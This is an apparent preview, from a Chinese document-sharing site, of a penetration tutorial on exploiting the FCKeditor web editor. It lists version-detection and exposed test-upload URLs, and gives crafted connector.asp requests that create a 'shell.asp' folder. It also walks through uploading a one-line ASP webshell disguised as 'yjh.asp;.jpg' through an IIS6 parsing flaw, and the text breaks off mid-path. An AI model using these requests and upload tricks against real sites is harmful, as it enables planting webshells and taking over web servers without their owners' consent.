第二十部分FCK编辑器利用.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
第二十部分FCK编辑器利用

FckEditor编辑器利用方法: 查看版本的方法: 第一种:FCKeditor/_whatsnew.html(通常会被管理员删除) 第二种:FCKeditor/editor/dialog/fck_about.html(常用方式) 版本不同利用方法不同。 各版本利用地址 FCKeditor v2.4.3 1.FCKeditor/editor/filemanager/browser/default/connectors/test.html 2.FCKeditor/editor/filemanager/upload/test.html 3.FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFilesType=ImageCurrentFolder=/ 4.FCKeditor/editor/filemanager/browser/default/browser.html?type=Imageconnector=connectors/asp/connector.asp 5.FCKeditor/editor/filemanager/browser/default/browser.html?Type=ImageConnector=/fckeditor/editor/filemanager/connectors/php/connector.php FCKeditor V2.6.6 1.FCKeditor/editor/filemanager/connectors/test.html 2.FCKeditor/editor/filemanager/connectors/uploadtest.html ----------------------------------------------------------------------- 过滤不严 FCKeditor x.x - FCKeditor v2.4.3 影响版本:FCKeditor x.x = FCKeditor v2.4.3 脆弱描述: FCKeditor v2.4.3中File类别默认拒绝上传类型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc| pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm Fckeditor 2.0 = 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件 上传后 它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension为后缀 直接导致在win下在上传文件后面加个.来突破 而在apache下,因为Apache文件名解析缺陷漏洞也可以利用之。 攻击利用: 允许其他任何后缀上传 强制建立shell.asp目录: FCKeditor V2.6.X FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolderType=ImageCurrentFolder=/shell.aspNewFolderName=zuuid=1244789975684 FCKeditor v2.4.X FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolderCurrentFolder=/Type=ImageNewFolderName=shell.asp 实例演示: / Fckeditor版本(V2.6.3): /fckeditor/editor/dialog/fck_about.html 存在uploadtest.html页面 /FCKeditor/editor/filemanager/connectors/uploadtest.html 主站使用aspx,这里选择ASP.Net: Resource Type选择Image IIS6.0,可以使用解析漏洞,例如:xx.asp;.jpg 这里我们上传小马,小马名字命名为yjh.asp;.jpg 上传成功,但是,名字yjh_asp;.jpg,”.”变”_”了,我们二次上传看看。 没问题上传成功了。一句话木马地址是 //UserFiles/yjh.

文档评论(0)

fds373ix + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档